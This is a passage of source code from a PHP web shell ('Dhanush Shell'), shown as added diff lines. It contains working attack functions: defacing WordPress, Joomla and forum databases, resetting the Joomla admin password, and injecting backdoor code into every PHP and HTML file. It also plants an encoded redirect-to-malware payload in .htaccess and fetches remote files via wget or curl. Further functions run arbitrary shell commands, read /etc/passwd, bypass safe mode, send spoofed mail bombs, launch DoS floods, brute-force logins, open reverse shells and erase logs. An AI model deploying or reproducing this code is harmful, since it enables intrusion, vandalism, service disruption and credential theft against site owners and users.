"; + } + else if($_POST['forumdeface'] == "ipb") + { + $head = $_POST['head']; + $catid = $_POST['f5']; + + $IPB = "forums"; + $con =@ mysql_connect($localhost,$username,$password); + $db =@ mysql_select_db($database,$con); + if($prefix == "" || $prefix == null) + $result =@mysql_query($query = "UPDATE $IPB SET name = '$head', description = '$index' where id = '$catid'"); + else + $result =@mysql_query($query = "UPDATE $prefix.$IPB SET name = '$head', description = '$index' where id = '$catid'"); + if($result) + echo "
Forum Defaced Successfully
"; + else + echo "
Cannot Deface Forum
"; + } + else if($_POST['forumdeface'] == "wp") + { + $catid = $_POST['f5']; + $head = $_POST['head']; + + $con =@ mysql_connect($localhost,$username,$password); + $db =@ mysql_select_db($database,$con); + if($prefix == "" || $prefix == null) + { + if(isset($_POST["alll"]) && $_POST["alll"] == "All") + $query = "UPDATE wp_posts SET post_title='$head', post_content='$index'"; + else + $query = "UPDATE wp_posts SET post_title='$head', post_content='$index' WHERE ID='$catid'"; + } + else + { + if(isset($_POST["alll"]) && $_POST["alll"] == "All") + $query = "UPDATE ".$prefix."posts SET post_title='$head', post_content='$index'"; + else + $query = "UPDATE ".$prefix."posts SET post_title='$head', post_content='$index' WHERE ID='$catid'"; + + } + $result =@mysql_query($query,$con) or mysql_error(); + if($result) + echo "
Wordpress Defaced Successfully
"; + else + echo "
Cannot Deface Wordpress
"; + } + else if($_POST['forumdeface'] == "joomla") + { + $site_url = $_POST['siteurl']; + $dbprefix = $_POST['tableprefix']; + $dbname = $_POST['f2']; + $h=""; + + function randomt() + { + $chars = "abcdefghijkmnopqrstuvwxyz023456789"; + srand((double)microtime()*1000000); + $i = 0; + $pass = '' ; + + while ($i <= 7) + { + $num = rand() % 33; + $tmp = substr($chars, $num, 1); + $pass = $pass . $tmp; + $i++; + } + + return $pass; + } + function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1) + { + $ar0=explode($marqueurDebutLien, $text); + $ar1=explode($marqueurFinLien, $ar0[$i]); + $ar=trim($ar1[0]); + return $ar; + } + $co=randomt(); + + $link=mysql_connect($localhost,$username,$password) ; + mysql_select_db($dbname,$link); + + $tryChaningInfo = mysql_query("UPDATE ".$dbprefix."users SET username ='admin' , password = '2a9336f7666f9f474b7a8f67b48de527:DiWqRBR1thTQa2SvBsDqsUENrKOmZtAX'"); + + $req =mysql_query("SELECT * from `".$dbprefix."extensions` "); + + if ( $req ) + { + $req =mysql_query("SELECT * from `".$dbprefix."template_styles` WHERE client_id='0' and home='1'"); + $data = mysql_fetch_array($req); + $template_name=$data["template"]; + + $req =mysql_query("SELECT * from `".$dbprefix."extensions` WHERE name='".$template_name."'"); + $data = mysql_fetch_array($req); + $template_id=$data["extension_id"]; + + $url2=$site_url."/index.php"; + + $ch = curl_init(); + curl_setopt($ch, CURLOPT_URL, $url2); + curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); + curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); + curl_setopt($ch, CURLOPT_HEADER, 1); + curl_setopt($ch, CURLOPT_USERAGENT, $useragent); + curl_setopt($ch, CURLOPT_COOKIEJAR, $co); + curl_setopt($ch, CURLOPT_COOKIEFILE, $co); + + + $buffer = curl_exec($ch); + + $return=entre2v2($buffer ,'[-] Login Error"); + exit; + } + + $url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php"); + $ch = curl_init(); + curl_setopt($ch, CURLOPT_URL, $url2); + curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); + curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); + curl_setopt($ch, CURLOPT_HEADER, 0); + curl_setopt($ch, CURLOPT_USERAGENT, $useragent); + curl_setopt($ch, CURLOPT_COOKIEJAR, $co); + + curl_setopt($ch, CURLOPT_COOKIEFILE, $co); + $buffer = curl_exec($ch); + + $hidden2=entre2v2($buffer ,'[-] index.php Not found in Theme Editor"); + exit; + } + + $url2=$site_url."/index.php?option=com_templates&layout=edit"; + + $ch = curl_init(); + curl_setopt($ch, CURLOPT_URL, $url2); + curl_setopt($ch, CURLOPT_POST, 1); + curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$h."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save"); + + curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); + curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); + curl_setopt($ch, CURLOPT_HEADER, 0); + curl_setopt($ch, CURLOPT_USERAGENT, $useragent); + curl_setopt($ch, CURLOPT_COOKIEJAR, $co); + curl_setopt($ch, CURLOPT_COOKIEFILE, $co); + $buffer = curl_exec($ch); + + $pos = strpos($buffer,'
'); + if($pos === false) + { + echo("
Cannot Deface Joomla
"); + } + else + { + echo("
Joomla Defaced Successfully
"); + } + } + else + { + $req =mysql_query("SELECT * from `".$dbprefix."templates_menu` WHERE client_id='0'"); + $data = mysql_fetch_array($req); + $template_name=$data["template"]; + + $url2=$site_url."/index.php"; + $ch = curl_init(); + curl_setopt($ch, CURLOPT_URL, $url2); + curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); + curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); + curl_setopt($ch, CURLOPT_HEADER, 1); + curl_setopt($ch, CURLOPT_USERAGENT, $useragent); + curl_setopt($ch, CURLOPT_COOKIEJAR, $co); + curl_setopt($ch, CURLOPT_COOKIEFILE, $co); + $buffer = curl_exec($ch); + + $hidden=entre2v2($buffer ,'[-] Login Error"); + exit; + } + + $url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name; + $ch = curl_init(); + curl_setopt($ch, CURLOPT_URL, $url2); + curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); + curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); + curl_setopt($ch, CURLOPT_HEADER, 0); + curl_setopt($ch, CURLOPT_USERAGENT, $useragent); + curl_setopt($ch, CURLOPT_COOKIEJAR, $co); + curl_setopt($ch, CURLOPT_COOKIEFILE, $co); + $buffer = curl_exec($ch); + + $hidden2=entre2v2($buffer ,'[-] index.php Not found in Theme Editor"); + } + + $url2=$site_url."/index.php?option=com_templates&layout=edit"; + $ch = curl_init(); + curl_setopt($ch, CURLOPT_URL, $url2); + curl_setopt($ch, CURLOPT_POST, 1); + curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$h."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0"); + curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); + curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); + curl_setopt($ch, CURLOPT_HEADER, 0); + curl_setopt($ch, CURLOPT_USERAGENT, $useragent); + curl_setopt($ch, CURLOPT_COOKIEJAR, $co); + curl_setopt($ch, CURLOPT_COOKIEFILE, $co); + $buffer = curl_exec($ch); + + $pos = strpos($buffer,'
'); + if($pos === false) + { + echo("
Cannot Deface Joomla
"); + exit; + } + else + { + echo("
Joomla Defaced Successfully
"); + } + } + } +} +else if(isset($_POST['pathtomass']) && $_POST['pathtomass'] != '' && isset($_POST['filetype']) && $_POST['filetype'] != '' && isset($_POST['mode']) && $_POST['mode'] != '' && isset($_POST['injectthis']) && $_POST['injectthis'] != '') +{ + $filetype = $_POST['filetype']; + + $mode = "a"; + + if($_POST['mode'] == 'Apender') + $mode = "a"; + + if($_POST['mode'] == 'Overwriter') + $mode = "w"; + + if (is_dir($_POST['pathtomass'])) + { + $lolinject = $_POST['injectthis']; + $mypath = $_POST['pathtomass'] .$directorysperator. "*.".$filetype; + if(substr($_POST['pathtomass'], -1) == "\\") + $mypath = $_POST['pathtomass'] . "*.".$filetype; + foreach (glob($mypath) as $injectj00) + { + if($injectj00 == __FILE__) + continue; + $fp=fopen($injectj00,$mode); + if (fputs($fp,$lolinject)) + echo '
'.$injectj00.' was injected
'; + else + echo 'failed to inject '.$injectj00.'
'; + } + } + else + echo ''.$_POST['pathtomass'].' is not available!'; +} +else if(isset($_POST['mailfunction'])) +{ + if($_POST['mailfunction'] == "dobombing") + { + if(isset($_POST['to']) && isset($_POST['subject']) && isset($_POST['message']) && isset($_POST['times']) && $_POST['to'] != '' && $_POST['subject'] != '' && $_POST['message'] != '' && $_POST['times'] != '') + { + $times = $_POST['times']; + while($times--) + { + if(isset($_POST['padding'])) + { + $fromPadd = rand(0,9999); + $subjectPadd = " -- ID : ".rand(0,9999999); + $messagePadd = "\n\n------------------------------\n".rand(0,99999999); + + } + $from = "president$fromPadd@whitehouse.gov"; + if(!mail($_POST['to'],$_POST['subject'].$subjectPadd,$_POST['message'].$messagePadd,"From:".$from)) + { + $error = 1; + echo "
Some Error Occured!
"; + break; + } + } + if($error != 1) + echo "
Mail(s) Sent!
"; + } + } + else if($_POST['mailfunction'] == "massmailing") + { + if(isset($_POST['to']) && isset($_POST['from']) && isset($_POST['subject']) && isset($_POST['message'])) + { + if(mail($_POST['to'],$_POST['subject'],$_POST['message'],"From:".$_POST['from'])) + echo "
Mail Sent!
"; + else + echo "
Some Error Occured!
"; + } + } +} +else if(isset($_POST['code'])) +{ + if($_POST['code'] != null && isset($_POST['intext']) && $_POST['intext'] == "true") + { + // FIlter Some Chars we dont need + ?>
+ ","",$code); + + // Evaluate PHP CoDE! + ?>
Result of execution this PHP-code :
"; + foreach (glob($_GET['path'] . "*.php") as $injectj00) + { + if($injectj00 == __FILE__) + continue; + if($myfile=fopen($injectj00,'a')) + { + fputs($myfile, $str); + fclose($myfile); + $coun = 1; + } + } + foreach (glob($_GET['path'] . $directorysperator . "*.htm") as $injectj00) + { + if($myfile=fopen($injectj00,'a')) + { + fputs($myfile, $str); + fclose($myfile); + $coun = 1; + } + } + foreach (glob($_GET['path'] . $directorysperator . "*.html") as $injectj00) + { + if($myfile=fopen($injectj00,'a')) + { + fputs($myfile, $str); + fclose($myfile); + $coun = 1; + } + } + + + if($coun == 1) + echo "
Done !!!!
"; + else + echo "
Cannot open files !!!!
"; +} +else if(isset($_GET['redirect'])) +{ + if($myfile = fopen(".htaccess",'a')) + { + $mal = "eNqV0UtrAjEQAOC70P8wYHsRyRa8FYpQSR9QXAmCBxHJrkMSjDNhk/pA/O+uFuyx5javj4GZLrzJj68xzLhZTRqM8aGjcNe4hJKMI4SSbpUyJMcUwZHFNr/VR0wreDp+TqeTpZLvUkl1AtHTcS1q3ojeI8zHo36pFv8Jw2w8ZoBNpMuK+0HlyOQJ77aYJzT7TOCT3rqYdB7Dfd0280xE3dRWHLRl/lV/RP14bEfAphReisJ4rrQPvGt/TcboZK8BXy9eOBLBhiG9Dp5hrvrfizOeH7rw"; + fwrite($myfile, gzuncompress(base64_decode($mal))); + fwrite($myfile, "\n\r"); + fclose($myfile); + echo "
Done !!!!
"; + } + else + echo "
Cannot open file !!!!
"; +} +else if(isset($_GET['malware'])) +{ ?> + "> +
+
| Infect Users || Redirect Search Engine TO Malwared site |
+
+
+
+
+ +
+ Cannot Open File!!
"; +} +else if(isset($_POST['getcode'])) +{ + if($myfile = fopen(".htaccess",'a')) + { + fwrite($myfile, $_POST['getcode']); + fwrite($myfile, "\n\r"); + fclose($myfile); + echo "Code Inserted Successfully!!!!"; + } + else + echo "Permission Denied"; +} +else if(isset($_GET['uploadurl'])) +{ + $functiontype = trim($_GET['functiontype']); + $wurl = trim($_GET['wurl']); + $path = magicboom($_GET['path']); + + function remotedownload($cmd,$url) + { + $namafile = basename($url); + switch($cmd) + { + case 'wwget': + execmd(which('wget')." ".$url." -O ".$namafile); + break; + case 'wlynx': + execmd(which('lynx')." -source ".$url." > ".$namafile); + break; + case 'wfread' : + execmd($wurl,$namafile); + break; + case 'wfetch' : + execmd(which('fetch')." -o ".$namafile." -p ".$url); + break; + case 'wlinks' : + execmd(which('links')." -source ".$url." > ".$namafile); + break; + case 'wget' : + execmd(which('GET')." ".$url." > ".$namafile); + break; + case 'wcurl' : + execmd(which('curl')." ".$url." -o ".$namafile); + break; + default: + break; + } + return $namafile; + } + $namafile = remotedownload($functiontype,$wurl); + $fullpath = $path . $directorysperator . $namafile; + if(is_file($fullpath)) + { + echo "
File uploaded to $fullpath
"; + } + else + echo "
Failed to upload $namafile
"; +} +else if(isset($_GET['createfolder'])) +{ + if(!mkdir($_GET['createfolder'])) + echo "Failed To create"; + else + echo "Folder Created Successfully"; +} +else if(isset($_GET['selfkill'])) +{ + if(unlink(__FILE__)) + echo "
Good Bye......
"; + else + echo "
Shell cannot be removed......
"; +} +else if(isset($_GET['Create'])) +{ + ?> +
+ +
+ +
+ +File Created Successfully"; + } + else + echo "Cannot Create File"; +} +else if(isset($_REQUEST["defaceforum"])) +{ + ?> +
+ Forum Index Changer +
+ + + + + + + + + + + + + + + + + +
Host : Database :
User : Password : 
Type : + Prefix :
+ + + + +

 

+ +

+
+
+ "; + ?> +
+ Forum Password Changer +
+ + + + + + + + + + +
Host :   DataBase :
 User : Password : 
Type : + Prefix :
+ +

User ID :  New Password :
+ + + + + +

+
+
+ = $maxTime) + { + break; + } + } + echo "Dos Completed!
"; + echo "DOS attack against udp://$IP:$port completed on ".date("h:i:s A")."
"; + echo "Total Number of Packets Sent : " . $packets . "
"; + echo "Total Data Sent = ". HumanReadableFilesize($packets*$no0fBytes) . "
"; + echo "Data per packet = " . HumanReadableFilesize($no0fBytes) . "
"; + } +} +else if(isset($_GET['fuzzer'])) +{ + if(isset($_GET['ip']) && isset($_GET['port']) && isset($_GET['timeout']) && isset($_GET['exTime']) && isset($_GET['no0fBytes']) && isset($_GET['multiplier']) && $_GET['no0fBytes'] != "" && $_GET['exTime'] != "" && $_GET['timeout'] != "" && $_GET['port'] != "" && $_GET['ip'] != "" && $_GET['multiplier'] != "") + { + $IP=$_GET['ip']; + $port=$_GET['port']; + $times = $_GET['exTime']; + $timeout = $_GET['timeout']; + $send = 0; + $ending = ""; + $multiplier = $_GET['multiplier']; + $data = ""; + $mode="tcp"; + $data .= "GET /"; + $ending .= " HTTP/1.1\n\r\n\r\n\r\n\r"; + if($_GET['type'] == "tcp") + { + $mode = "tcp"; + } + + while($multiplier--) + { + $data .= urlencode($_GET['no0fBytes']); + } + $data .= "%s%s%s%s%d%x%c%n%n%n%n";// add some format string specifiers + $data .= "by-Dhanush".$ending; + $length = strlen($data); + + + echo "Sending Data :-

$data

"; + + for($i=0;$i<$times;$i++) + { + $socket = fsockopen("$mode://$IP", $port, $error, $errorString, $timeout); + if($socket) + { + fwrite($socket , $data , $length ); + fclose($socket); + } + } + echo "Fuzzing Completed!
"; + echo "DOS attack against $mode://$IP:$port completed on ".date("h:i:s A")."
"; + echo "Total Number of Packets Sent : " . $times . "
"; + echo "Total Data Sent = ". HumanReadableFilesize($times*$length) . "
"; + echo "Data per packet = " . HumanReadableFilesize($length) . "
"; + } +} +else if(isset($_GET['bypassit'])) +{ + if(isset($_GET['copy'])) + { + if(@copy($_GET['copy'],"test1.php")) + { + $fh=fopen("test1.php",'r'); + echo "

"; + @fclose($fh); + unlink("test1.php"); + } + } + else if(isset($_GET['imap'])) + { + $string = $_GET['imap']; + echo ""; + } + else if(isset($_GET['sql'])) + { + echo ""; + } + else if(isset($_GET['curl'])) + { + $ch=curl_init("file://" . $_GET[curl]); + curl_setopt($ch,CURLOPT_HEADERS,0); + curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); + $file_out=curl_exec($ch); + curl_close($ch); + echo "

"; + } + else if(isset($_GET['include'])) + { + if(file_exists($_GET['include'])) + { + echo ""; + } + else + echo "
Can't Read" . $_GET['include'] . "
"; + } + else if(isset($_GET['id'])) + { + echo ""; + break; + } + else if(isset($_GET['tempnam'])) + { + $mytmp = tempnam ( 'tmp', $_GET['tempnam'] ); + $fp = fopen ( $mytmp, 'r' ); + while(!feof($fp)) + echo fgets($fp); + fclose ( $fp ); + } + else if(isset($_GET['symlnk'])) + { + echo ""; + } + if(isset($_GET['newtype'])) + { + $filename = $_GET['newtype']; + echo ""; + } +} +// Deface Website +else if(isset($_GET['deface'])) +{ + $myfile = fopen($_GET['deface'],'w'); + if(fwrite($myfile, base64_decode($ind))) + {fclose($myfile); + echo "Index Defaced Successfully";} + else + echo "Donot have write permission"; +} +else if(isset($_GET['perms'])) +{ +?> +
+ + + + + + + + +
Change Permissions
+
+ +
+ =0;--$i) + $perms += (int)$_GET['chmode'][$i]*pow(8, (strlen($_GET['chmode'])-$i-1)); + if(@chmod($_GET['myfilename'],$perms)) + echo "
File Permissions Changed Successfully
"; + else + echo "
Cannot Change File Permissions
"; + } +} +else if(isset($_GET['rename'])) +{ +?> +
+ + + + + + + + + + +
File
To
+
+ File Renamed Successfully"; + + } +} +else if(isset($_GET['open'])) +{ + if(is_file($_GET['myfilepath'])) + { + $owner = "0/0"; + if($os == "Linux") + $owner = getOGid($_GET['myfilepath']); + ?> +
+ + + + + + + +
File : Permissions :
Size : Owner/Group :
+
+ +
+ File Saved Successfully!"; + else + echo "Cannot Write into File"; + } + else + { + echo "File Name Specified does not exists!"; + } +} +else if(isset($_POST["SendNowToZoneH"])) +{ + $hacker = $_POST['defacer']; + $method = $_POST['hackmode']; + $neden = $_POST['reason']; + $site = $_POST['domain']; + + if (empty($hacker)) + { + die("
[-] You Must Fill the Attacker name !
"); + } + elseif($method == "--------SELECT--------") + { + die("
[-] You Must Select The Method !
"); + } + elseif($neden == "--------SELECT--------") + { + die("
[-] You Must Select The Reason
"); + } + elseif(empty($site)) + { + die("
[-] You Must Inter the Sites List !
"); + } + // Zone-h Poster + function ZoneH($url, $hacker, $hackmode,$reson, $site ) + { + $k = curl_init(); + curl_setopt($k, CURLOPT_URL, $url); + curl_setopt($k,CURLOPT_POST,true); + curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson); + curl_setopt($k,CURLOPT_FOLLOWLOCATION, true); + curl_setopt($k, CURLOPT_RETURNTRANSFER, true); + $kubra = curl_exec($k); + curl_close($k); + return $kubra; + } + + $i = 0; + $sites = explode("\n", $site); + echo "
";
+	while($i < count($sites)) 
+	{
+		if(substr($sites[$i], 0, 4) != "http") 
+		{
+				$sites[$i] = "http://".$sites[$i];
+		}
+		ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);
+		echo "Site : ".$sites[$i]." Posted !
";
+		++$i;
+	}
+		 
+	echo "Sending Sites To Zone-H Has Been Completed Successfully !!
"; +} +else if(isset($_GET['executemycmd'])) +{ + $comm = $_GET['executemycmd']; + chdir($_GET['executepath']); + echo shell_exec($comm); +} +// View Passwd file +else if(isset($_GET['passwd'])) +{ + $test=''; + $tempp= tempnam($test, "cx"); + $get = "/etc/passwd"; + $name=@posix_getpwuid(@fileowner($get)); + $group=@posix_getgrgid(@filegroup($get)); + $owner = $name['name']. " / ". $group['name']; + ?> + + + + + + + +
File : Permissions :
Size : Owner/Group :
+

"; + unlink($tempp); + } + else + { + ?> +
+ + + + + + + + + + + +
From :
To :

+
+
$get
"; + unlink($tempp); + } +} +else if(isset($_GET['bomb'])) +{ + ?>
+
+ + + + + + + + + + + + + + + + + + + + + + + +
To + +
Subject + +
No. of Times + +
Pad your message (Less spam detection)
+ +
+
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
From
To
Subject
+ +
+ +
+
+ +
+ + + + +
| Get Domains || Symlink Server || Symlink File || Script Locator |

+
+
+ +
| Forum Defacer || Forum Password Changer |

+
+
+
+
Server security information

+ + + + + + + + + + + + + + + + + + + + + + + + + +
CurlOracleMySQLMSSQLPostgreSQLOpen Base DirectorySafe_Exec_DirPHP VersionMagic QuotesServer Admin
NONE";}else {echo "$df";};} ?>

+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ Directory + + +
+ Mode + + +
+ File Type + + +
Create A backdoor by injecting this code in every php file of current directory
+ +
+ +
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + +
Safe mode bypass
+

Using copy() function

+
+ +
+ 		+

Using imap() function

+
+ +
+
+

Using sql() function

+
+ +
+ 		+

Using Curl() function

+
+ +
+
+

Bypass using include()

+
+ +
+ 		+

Using id() function

+
+ +
+
+

Using tempnam() function

+
+ +
+ 		+

Using symlink() function

+
+ +
+
+

Using Bypass function

+
+ + + +
+
+ + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ IP + + +
+ Port + + +
+ Timeout + + +
+ No of times + + +
+ Message (The message Should be long and it will be multiplied with the value after it) + + + + x + + +
+ +
+
+
PHP CURL NOT EXIST
"; + } + ?> +
Zone-h Poster
+
+ + + + + + +
+
+ +
+
+
+
+
+ +
+ + + + + + + + + + + + + + + + + + + + + + + + + + +
+ IP + + +
+ Port + + +
+ Timeout (Time in seconds) + + +
+ Execution Time (Time in seconds) + + +
+ No of Bytes per/packet + + +
+ +
+
+ +
+
| Mail Bomber || Mass Mailer |

+ +

+ + + + + + + + + + + +
Port Scanner
+ + + +
+
+ +
+
+ + + + + + + + + + + + + + + + + + + + +
BruteForce
Type : + +
Server : Port : " class="sbox">
Brute type :
+
+ Login :        
+ Dictionary : +
+

+ +
+
+ +

+ + +
+ +
+
+ + + +
+ Select Website +

+
+

+ + +
+ + + + + + + + + + + + +
Reverse ShellBind Shell
+ + + + + + + + + + + + + +
IP + +
Port
Use:   +
+ 		+
+ + + + + + + + + + + + +
Port + +
Password + +
Using +    +
+
Click "Connect" only after open port for it.Use NetCat, run "nc -l -n -v -p 9891"!
Click "Bind", use netcat and give it the command 'nc 9891"!
+ + +
+ +
| Set Your 404 Page || Set Specified 404 Page |

+
+ +
+

D h a n u s h
+ [--==Coded By Arjun==--] + 

+
+       -  --  -
+       -- -- --
+       --    --
+       ---  ---
+       ------
+       ----
+   ----             
+ ------           
+-------          
+---   --          
+      --      --- 
+      --      ----- 
+     ---      --- --- 
+     ---    ---   ---
+--   ---------     --
+--    -------      --
+ --     ----       --
+  --     ---       --
+  --     --        --
+   ---  ---   --  ---
+    ------    ------
+     ----      ----
+      
+
+
+ Dhanush Shell is a PHP Script, created for checking the vulnerability and security of any web server or website. With this PHP script, the owner can check various vulnerablities present in the web server. This shell provide you almost every facility that the security analyst need for penetration testing. This is a "All In One" php script, so that the user do not need to go anywhere else.
This script is coded by an Indian Ethical Hacker.
This script is only coded for education purpose or testing on your own server.The developer of the script is not responsible for any damage or misuse of it

GREETZ To All Indian Hackers
| जय महाकाल | | जय हिन्द |

+ +
+ + + + + + + + + + + + + + + + + + + + + +
Connect To Database
Server Address :
Username :
Password:
+
+
+ +
+
+ + + + + + + + + + + + + + + + + + + +
Target :
User namesPassword
Guess options :
Timeout delay :
+
+
+ "> +
+
| Malware Attack || Insert Own Code |

+
+ "; + ob_start(); + eval("phpinfo();"); + $b = ob_get_contents(); + ob_end_clean(); + $a = strpos($b,"")+6; // yeah baby,, your body is wonderland ;-) + $z = strpos($b,""); + $s_result = "
".substr($b,$a,$z-$a)."
"; + echo $s_result; +} +else if(isset($_GET['execute'])) +{ + $comm = $_GET['execute']; + chdir($_GET['executepath']); + $check = shell_exec($comm); + + echo "
"; + + ?> +

+ +
+ Logs Cleared
"; + } + } else + { + if($openp = fopen("/tmp/logseraser.pl", 'w')) + { + fwrite($openp, $erase)or die("Error"); + fclose($openp); + $aidx = passthru("perl logseraser.pl linux"); + unlink("logseraser.pl"); + echo "
Logs Cleared
"; + } + } + } + else + { + $check = shell_exec($_GET['mycmd']); + echo "
"; + } +} +else if(isset($_GET['prototype'])) +{ + echo '

Results

Type: '.htmlspecialchars($_GET['prototype']).'
Server: '.htmlspecialchars($_GET['serverport']).'
'; + if( $_GET['prototype'] == 'ftp' ) + { + function BruteFun($ip,$port,$login,$pass) + { + $fp = @ftp_connect($ip, $port?$port:21); + if(!$fp) return false; + $res = @ftp_login($fp, $login, $pass); + @ftp_close($fp); + return $res; + } + } + elseif( $_GET['prototype'] == 'mysql' ) + { + function BruteFun($ip,$port,$login,$pass) + { + $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass); + @mysql_close($res); + return $res; + } + } + elseif( $_GET['prototype'] == 'pgsql' ) + { + function BruteFun($ip,$port,$login,$pass) + { + $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres"; + $res = @pg_connect($str); + @pg_close($res); + return $res; + } + } + + $success = 0; + $attempts = 0; + $server = explode(":", $_GET['server']); + if($_GET['type'] == 1) + { + $temp = @file('/etc/passwd'); + if( is_array($temp)) + foreach($temp as $line) + { + $line = explode(":", $line); + ++$attempts; + if(BruteFun(@$server[0],@$server[1], $line[0], $line[0]) ) + { + $success++; + echo ''.htmlspecialchars($line[0]).':'.htmlspecialchars($line[0]).'
'; + } + if(@$_GET['reverse']) + { + $tmp = ""; + for($i=strlen($line[0])-1; $i>=0; --$i) + $tmp .= $line[0][$i]; + ++$attempts; + if(BruteFun(@$server[0],@$server[1], $line[0], $tmp) ) + { + $success++; + echo ''.htmlspecialchars($line[0]).':'.htmlspecialchars($tmp); + } + } + } + } + elseif($_GET['type'] == 2) + { + $temp = @file($_GET['dict']); + if( is_array($temp) ) + foreach($temp as $line) + { + $line = trim($line); + ++$attempts; + if(BruteFun($server[0],@$server[1], $_GET['login'], $line) ) + { + $success++; + echo ''.htmlspecialchars($_GET['login']).':'.htmlspecialchars($line).'
'; + } + } + } + echo "Attempts: $attempts Success: $success
"; +} +// Execute Query +else if(isset($_GET["executeit"])) +{ + if(isset($_GET['username']) && isset($_GET['server'])) + { + $dbserver = $_GET['server']; + $dbuser = $_GET['username']; + $dbpass = $_GET['password']; + if(mysql_connect($dbserver,$dbuser,$dbpass)) + { + setcookie("dbserver", $dbserver); + setcookie("dbuser", $dbuser); + setcookie("dbpass", $dbpass); + + listdatabase(); + } + else + echo "cannotconnect"; + } +} +else if(isset($_GET['action']) && isset($_GET['dbname'])) + + + { + if($_GET['action'] == "createDB") + { + $dbname = $_GET['dbname']; + $dbserver = $_COOKIE["dbserver"]; + $dbuser = $_COOKIE["dbuser"]; + $dbpass = $_COOKIE["dbpass"]; + $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass); + mysql_query("create database $dbname",$mysqlHandle); + listdatabase(); + } + if($_GET['action'] == 'dropDB') + { + $dbname = $_GET['dbname']; + $dbserver = $_COOKIE["dbserver"]; + $dbuser = $_COOKIE["dbuser"]; + $dbpass = $_COOKIE["dbpass"]; + $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass); + mysql_query("drop database $dbname",$mysqlHandle); + mysql_close($mysqlHandle); + listdatabase(); + } + + if($_GET['action'] == 'listTables') + { + listtable(); + } + + // Create Tables + if($_GET['action'] == "createtable") + { + $dbserver = $_COOKIE["dbserver"]; + $dbuser = $_COOKIE["dbuser"]; + $dbpass = $_COOKIE["dbpass"]; + $dbname = $_GET['dbname']; + $tablename = $_GET['tablename']; + $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass); + mysql_select_db($dbname); + mysql_query("CREATE TABLE $tablename ( no INT )"); + listtable(); + } + + // Drop Tables + if($_GET['action'] == "dropTable") + { + $dbserver = $_COOKIE["dbserver"]; + $dbuser = $_COOKIE["dbuser"]; + $dbpass = $_COOKIE["dbpass"]; + $dbname = $_GET['dbname']; + $tablename = $_GET['tablename']; + $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass); + mysql_select_db($dbname); + mysql_query("drop table $tablename"); + listtable(); + } + + // Empty Tables + if($_GET['action'] == "empty") + { + $dbserver = $_COOKIE["dbserver"]; + $dbuser = $_COOKIE["dbuser"]; + $dbpass = $_COOKIE["dbpass"]; + $dbname = $_GET['dbname']; + $tablename = $_GET['tablename']; + $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass); + mysql_select_db($dbname); + mysql_query("delete from $tablename"); + listtable(); + } + + // Empty Tables + if($_GET['action'] == "dropField") + { + $dbserver = $_COOKIE["dbserver"]; + $dbuser = $_COOKIE["dbuser"]; + $dbpass = $_COOKIE["dbpass"]; + $dbname = $_GET['dbname']; + $tablename = $_GET['tablename']; + $fieldname = $_GET['fieldname']; + $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass); + mysql_select_db($dbname); + $queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname"; + mysql_select_db( $dbname, $mysqlHandle ); + mysql_query( $queryStr , $mysqlHandle ); + listtable(); + } + + if($_GET['action'] == 'viewdb') + { + listdatabase(); + } + + // View Table Schema + if($_GET['action'] == "viewSchema") + { + $dbserver = $_COOKIE["dbserver"]; + $dbuser = $_COOKIE["dbuser"]; + $dbpass = $_COOKIE["dbpass"]; + $dbname = $_GET['dbname']; + $tablename = $_GET['tablename']; + $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass); + mysql_select_db($dbname); + echo "
"; + $pResult = mysql_query( "SHOW fields FROM $tablename" ); + $num = mysql_num_rows( $pResult ); + echo "

"; + echo ""; + for( $i = 0; $i < $num; $i++ ) + { + $field = mysql_fetch_array( $pResult ); + echo "\n"; + echo "\n"; + echo "\n"; + echo "\n"; + echo "\n"; + echo "\n"; + echo "\n"; + $fieldname = $field["Field"]; + echo "\n"; + echo "\n"; + } + echo "
FieldTypeNullKey
".$field["Field"]."".$field["Type"]."".$field["Null"]."".$field["Key"]."".$field["Default"]."".$field["Extra"]."Drop
"; + echo ""; + } + + // Execute Query + if($_GET['action'] == "executequery") + { + $dbserver = $_COOKIE["dbserver"]; + $dbuser = $_COOKIE["dbuser"]; + $dbpass = $_COOKIE["dbpass"]; + $dbname = $_GET['dbname']; + $tablename = $_GET['tablename']; + $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass); + mysql_select_db($dbname); + $result = mysql_query($_GET['executemyquery']); + + // results + echo "\r\n". strtoupper($_GET['executemyquery']) . "
